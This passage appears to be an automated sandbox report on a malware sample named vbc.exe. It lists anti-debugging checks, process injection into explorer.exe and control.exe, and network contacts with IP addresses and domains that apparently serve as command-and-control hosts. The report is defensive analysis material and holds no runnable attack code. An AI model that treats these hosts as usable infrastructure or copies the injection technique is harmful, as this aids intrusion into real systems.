        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_0166B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01688A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015F927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_0167EA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01644257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015D3A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015B5210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015BAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015C8A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_0167AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015F4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015ED294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015ED294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EFAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D7D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F3D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01633540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01663D40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0163A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167E539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BAD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01668DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016805AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016805AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E35A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EBC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016714FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CEF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CFF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DF716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EE730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F37F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C8794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166FE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E8E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BE620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E36CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F8EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166FEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E16E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C76E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016346A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164FE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\explorer.exe | Network Connect: 192.185.131.238 80
        Source: C:\Windows\explorer.exe | Network Connect: 108.167.169.56 80
        Source: C:\Windows\explorer.exe | Network Connect: 103.141.97.24 80
        Source: C:\Windows\explorer.exe | Domain query: www.funwave.info
        Source: C:\Windows\explorer.exe | Domain query: www.tadeumilhosrp.com
        Source: C:\Windows\explorer.exe | Domain query: www.reprograme-se10x.com
        Source: C:\Users\user\Desktop\vbc.exe | Section unmapped: C:\Windows\SysWOW64\control.exe base address: AF0000
        Source: C:\Users\user\Desktop\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\vbc.exe | Memory written: C:\Users\user\Desktop\vbc.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
        Source: C:\Users\user\Desktop\vbc.exe | Thread register set: target process: 3688
        Source: C:\Windows\SysWOW64\control.exe | Thread register set: target process: 3688
        Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.534282769.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.410398740.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
